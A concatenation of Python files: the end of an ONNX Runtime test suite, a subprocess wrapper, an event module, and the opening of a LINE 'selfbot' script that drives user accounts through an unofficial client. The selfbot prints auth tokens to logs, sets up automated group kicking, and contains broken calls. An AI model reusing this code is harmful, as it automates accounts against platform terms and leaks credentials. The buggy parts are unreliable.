self.assertEqual('', modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, len(lines)-1):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[-1])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt,
providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"),
providers=available_providers_without_tvm)
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"),
providers=available_providers_without_tvm)
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt,
providers=available_providers_without_tvm)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"),
providers=onnxrt.get_available_providers())
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so, providers=['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, sess_options=so1, providers=available_providers_without_tvm)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, sess_options=so2, providers=available_providers_without_tvm)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, sess_options=so3, providers=available_providers_without_tvm)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"),
providers=onnxrt.get_available_providers())
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testOrtValue_ghIssue9799(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
session = onnxrt.InferenceSession(get_name("identity_9799.onnx"),
providers=onnxrt.get_available_providers())
for seq_length in range(40, 200):
inps = np.ones((seq_length, 16, 7, 5, 3, 3)).astype(np.float32)
ort_val = onnxrt.OrtValue.ortvalue_from_numpy(inps, 'cuda', 0)
upstreams_onnxrt = {'input': ort_val}
outs = session.run(output_names=['output'], input_feed=upstreams_onnxrt)[0]
self.assertTrue(np.allclose(inps, outs))
def testSparseTensorCooFormat(self):
cpu_device = onnxrt.OrtDevice.make('cpu', 0)
shape = [9,9]
values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
# Linear indices
indices = np.array([3, 5, 15], dtype=np.int64)
sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, values, indices, cpu_device)
self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
self.assertEqual(sparse_tensor.dense_shape(), shape)
self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
self.assertEqual(sparse_tensor.device_name(), 'cpu')
# Get Data View on a numeric type.
values_ret = sparse_tensor.values()
self.assertFalse(values_ret.flags.writeable)
indices_ret = sparse_tensor.as_coo_view().indices()
self.assertFalse(indices_ret.flags.writeable)
# Run GC to test that values_ret still exhibits expected data
gc.collect()
self.assertTrue(np.array_equal(values, values_ret))
self.assertTrue(np.array_equal(indices, indices_ret))
# Test new Ortvalue interfaces
ort_value = onnxrt.OrtValue.ort_value_from_sparse_tensor(sparse_tensor)
sparse_tensor = ort_value.as_sparse_tensor()
values_ret = sparse_tensor.values()
self.assertFalse(values_ret.flags.writeable)
indices_ret = sparse_tensor.as_coo_view().indices()
self.assertFalse(indices_ret.flags.writeable)
gc.collect()
# Test string data on cpu only, need to subst values only
str_values = np.array(['xyz', 'yxz', 'zyx'], dtype=str)
str_sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, str_values, indices, cpu_device)
self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
self.assertEqual(str_sparse_tensor.dense_shape(), shape)
self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
self.assertEqual(str_sparse_tensor.device_name(), 'cpu')
# Get string values back
str_values_ret = str_sparse_tensor.values()
self.assertTrue(np.array_equal(str_values, str_values_ret))
# Check indices
str_indices_ret = str_sparse_tensor.as_coo_view().indices()
gc.collect()
self.assertFalse(str_indices_ret.flags.writeable)
self.assertTrue(np.array_equal(indices, str_indices_ret))
cuda_device = onnxrt.OrtDevice.make('cuda', 0)
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# Test to_cuda
copy_on_cuda = sparse_tensor.to_cuda(cuda_device)
self.assertEqual(copy_on_cuda.dense_shape(), shape)
self.assertEqual(copy_on_cuda.data_type(), "sparse_tensor(float)")
self.assertEqual(copy_on_cuda.device_name(), 'cuda')
# Test that gpu copy would fail to copy to cuda
with self.assertRaises(RuntimeError):
copy_on_cuda.to_cuda(cuda_device)
# Test that string tensor copy would fail
with self.assertRaises(RuntimeError):
str_sparse_tensor.to_cuda(cuda_device)
else:
# No cuda available
with self.assertRaises(RuntimeError):
sparse_tensor.to_cuda(cuda_device)
def testSparseTensorCsrFormat(self):
cpu_device = onnxrt.OrtDevice.make('cpu', 0)
shape = [9,9]
values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
inner_indices = np.array([1, 1, 1], dtype=np.int64)
outer_indices = np.array([0, 1, 2, 3, 3, 3, 3, 3, 3, 3], dtype=np.int64)
sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(shape, values, inner_indices, outer_indices, cpu_device)
self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(sparse_tensor.dense_shape(), shape)
self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
self.assertEqual(sparse_tensor.device_name(), 'cpu')
# Test CSR(C) indices
inner_indices_ret = sparse_tensor.as_csrc_view().inner()
outer_indices_ret = sparse_tensor.as_csrc_view().outer()
self.assertFalse(inner_indices_ret.flags.writeable)
self.assertFalse(outer_indices_ret.flags.writeable)
gc.collect()
self.assertTrue(np.array_equal(inner_indices, inner_indices_ret))
self.assertTrue(np.array_equal(outer_indices, outer_indices_ret))
# Test with strings
str_values = np.array(['xyz', 'yxz', 'zyx'], dtype=str)
str_sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(shape, str_values, inner_indices, outer_indices, cpu_device)
self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(str_sparse_tensor.dense_shape(), shape)
self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
self.assertEqual(str_sparse_tensor.device_name(), 'cpu')
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
cuda_device = onnxrt.OrtDevice.make('cuda', 0)
cuda_sparse_tensor = sparse_tensor.to_cuda(cuda_device)
self.assertEqual(cuda_sparse_tensor.device_name(), 'cuda')
self.assertEqual(cuda_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(cuda_sparse_tensor.dense_shape(), shape)
self.assertEqual(cuda_sparse_tensor.data_type(), "sparse_tensor(float)")
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
providers = [("CUDAExecutionProvider", {"do_copy_in_default_stream": True}), "CPUExecutionProvider"]
session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
# Create and register an arena based allocator
# ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
ort_memory_info = onnxrt.OrtMemoryInfo("Cpu", onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR, 0, onnxrt.OrtMemType.DEFAULT)
# Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
onnxrt.create_and_register_allocator(ort_memory_info, None)
# Create a session that will use the registered arena based allocator
so1 = onnxrt.SessionOptions()
so1.log_severity_level = 1
so1.add_session_config_entry("session.use_env_allocators", "1");
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so1, providers=onnxrt.get_available_providers())
# Create a session that will NOT use the registered arena based allocator
so2 = onnxrt.SessionOptions()
so2.log_severity_level = 1
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so2, providers=onnxrt.get_available_providers())
def testCheckAndNormalizeProviderArgs(self):
from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
valid_providers = ["a", "b", "c"]
def check_success(providers, provider_options, expected_providers, expected_provider_options):
actual_providers, actual_provider_options = check_and_normalize_provider_args(
providers, provider_options, valid_providers)
self.assertEqual(actual_providers, expected_providers)
self.assertEqual(actual_provider_options, expected_provider_options)
check_success(None, None, [], [])
check_success(["a"], None, ["a"], [{}])
check_success(["a", "b"], None, ["a", "b"], [{}, {}])
check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
with self.assertWarns(UserWarning):
check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
def check_failure(providers, provider_options):
with self.assertRaises(ValueError):
check_and_normalize_provider_args(providers, provider_options, valid_providers)
# disable this test
# provider not valid
#check_failure(["d"], None)
# providers not sequence
check_failure(3, None)
# providers value invalid
check_failure([3], None)
# provider_options not sequence
check_failure(["a"], 3)
# provider_options value invalid
check_failure(["a"], ["not dict"])
# providers and provider_options length mismatch
check_failure(["a", "b"], [{1: 2}])
# provider options unsupported mixed specification
check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
from onnxruntime.capi import _pybind_state as C
available_eps = C.get_available_providers()
#skip amd gpu build
if 'kRocmExecutionProvider' in available_eps:
return
if sys.platform.startswith("win"):
shared_library = 'test_execution_provider.dll'
elif sys.platform.startswith("darwin"):
# exclude for macos
return
else:
shared_library = './libtest_execution_provider.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
session_options = C.get_default_session_options()
sess = C.InferenceSession(session_options, custom_op_model, True, True)
sess.initialize_session(['my_ep'],
[{'shared_lib_path': shared_library,
'device_id':'1', 'some_config':'val'}],
set())
print("Create session with customize execution provider successfully!")
if __name__ == '__main__':
unittest.main(verbosity=1)
|
invocation.py | import os
import subprocess
import threading
from mediacrush.config import _cfgi
class Invocation:
crashed = False
exited = False
stdout = None
process = None
args = []
def __init__(self, command):
self.command = command
def __call__(self, *args, **kw):
self.args = self.command.format(*args, **kw).split()
return self
def _target(self):
try:
self.process = subprocess.Popen(
self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.stdout, _ = self.process.communicate()
except:
self.crashed = True
return
def run(self, timeout=_cfgi("max_processing_time")):
if not self.args:
self.args = self.command.split()
thread = threading.Thread(target=self._target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Terminating process")
self.process.terminate()
thread.join()
self.exited = True
self.stdout = self.stdout.decode("utf-8")
self.returncode = self.process.returncode
|
events.py | import signal
from threading import Thread
from types import FunctionType
from typing import Any, Callable, Protocol, Union, List
from .globals import PLATFORM
from .utils import isinstancemethod
__all__ = ["Event", "EventListener"]
#
# Types
#
Consumer = Callable[[Any], None]
BoundConsumer = Callable[[object], None]
class ListeningFunc(Protocol):
__threaded__: bool
__subscribes_to__: "Event"
__call__: Callable
__name__: str
# ---
class EventListener:
def __new__(cls, *args, **kwargs):
r"""
Filters callables that are marked a subscriber of an event to be registered as the callback.
"""
obj = super().__new__(cls)
for item_name in dir(obj):
item = getattr(obj, item_name, None)
if callable(item):
is_subscriber = getattr(item, '__subscribes_to__', False)
if is_subscriber is not False:
# the event itself is attached to __subscribes_to__ so we actually only
# subscribes to the event on class __new__
item.__subscribes_to__.subscribers.append(item)
return obj
class Event:
__slots__ = ("subscribers")
def __init__(self):
r"""
An Event Aggregator that allows observers to listen to certain events and observers in
this specific case are callables.
"""
self.subscribers: List[ListeningFunc] = []
def emit(self, *args, **kwargs):
if len(self.subscribers) != 0:
for cb in self.subscribers:
if cb.__threaded__ is True:
Thread(target=cb, args=args, kwargs=kwargs).start()
else:
cb(*args, *kwargs)
@staticmethod
def listen(event: Union[str, "Event"]=None, threaded: bool=True):
r"""
Decorated function can be of any type with the only exception that bound methods must
subclass under :class:`EventListener`.
"""
def wrapped(func: ListeningFunc) -> ListeningFunc:
if isinstance(event, str) or event is None:
name = event or func.__name__
target_event = globals().get(name.upper(), None)
if target_event is None or not isinstance(target_event, Event):
raise AttributeError(f"cannot find event with name {event}")
else:
target_event = event
if isinstancemethod(func):
func.__subscribes_to__ = target_event
func.__threaded__ = threaded
else:
func.__threaded__ = threaded
target_event.subscribers.append(func)
return func
return wrapped
# Window events
class ON_TERMINATE_EVENT(Event):
def emit(self, *args, **kwargs):
super().emit()
exit(0)
ON_TERMINATE = ON_TERMINATE_EVENT()
ON_START = Event()
ON_RESIZE = Event()
# IO
ON_KEY_PRESS = Event()
ON_MOUSE_CLICK = Event()
# Sigint and sigterm signals will start a system termination call
signal.signal(signal.SIGINT, ON_TERMINATE.emit)
signal.signal(signal.SIGTERM, ON_TERMINATE.emit)
#if PLATFORM != "Window":
# signal.signal(signal.SIGWINCH, ON_TERMINATE.emit)
del ON_TERMINATE_EVENT, PLATFORM
|
adit.py | Seal Team/adit.py /
@Seal Tean
Seal Team Update adit.py
Latest commit 762af3e on 29 Oct 2018
History
1 contributor
4312 lines (4064 sloc) 245 KB
# -*- coding: utf-8 -*-
import LINEPY
from LINEPY import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
#import pyimgflip
from googletrans import Translator
import youtube_dl
aditmadzs = LineClient()
#aditmadzs = LineClient(authToken='LOGIN TOKEN')
aditmadzs.log("Auth Token : " + str(aditmadzs.authToken))
channel = LineChannel(aditmadzs)
aditmadzs.log("Channel Access Token : " + str(channel.channelAccessToken))
ki = LineClient()
#ki = LineClient(authToken='LOGIN TOKEN')
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
#ubah mid di dalem admin,owner,creator.json dengan mid kalian
poll = LinePoll(aditmadzs)
call = aditmadzs
creator = ["U73ef509d545821a556dff2dee4459edf"]
owner = ["U73ef509d545821a556dff2dee4459edf"]
admin = ["U73ef509d545821a556dff2dee4459edf"]
staff = ["U73ef509d545821a556dff2dee4459edf"]
mid = aditmadzs.getProfile().mid
Amid = ki.getProfile().mid
KAC = [aditmadzs,ki]
ABC = [ki]
Bots = [mid,Amid]
Aditmadzs = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
welcome = []
simisimi = []
translateen = []
translateid = []
translateth = []
translatetw = []
translatear = []
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
aditProfile = aditmadzs.getProfile()
myProfile["displayName"] = aditProfile.displayName
myProfile["statusMessage"] = aditProfile.statusMessage
myProfile["pictureStatus"] = aditProfile.pictureStatus
responsename1 = ki.getProfile().displayName
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
with open('admin.json', 'r') as fp:
admin = json.load(fp)
Setbot1 = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot1)
Setbot2 = codecs.open("settings.json","r","utf-8")
settings = json.load(Setbot2)
Setbot3 = codecs.open("wait.json","r","utf-8")
wait = json.load(Setbot3)
Setbot4 = codecs.open("read.json","r","utf-8")
read = json.load(Setbot4)
mulai = time.time()
msg_dict = {}
msg_dict1 = {}
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
import urllib,request
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def atend():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def backupData():
try:
backup1 = Setmain
f = codecs.open('setting.json','w','utf-8')
json.dump(backup1, f, sort_keys=True, indent=4, ensure_ascii=False)
backup2 = settings
f = codecs.open('settings.json','w','utf-8')
json.dump(backup2, f, sort_keys=True, indent=4, ensure_ascii=False)
backup3 = wait
f = codecs.open('wait.json','w','utf-8')
json.dump(backup3, f, sort_keys=True, indent=4, ensure_ascii=False)
backup4 = read
f = codecs.open('read.json','w','utf-8')
json.dump(backup4, f, sort_keys=True, indent=4, ensure_ascii=False)
return True
except Exception as error:
logError(error)
return False
def restartBot():
backupData()
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
except:
no = "\n┗━━[ Success ]"
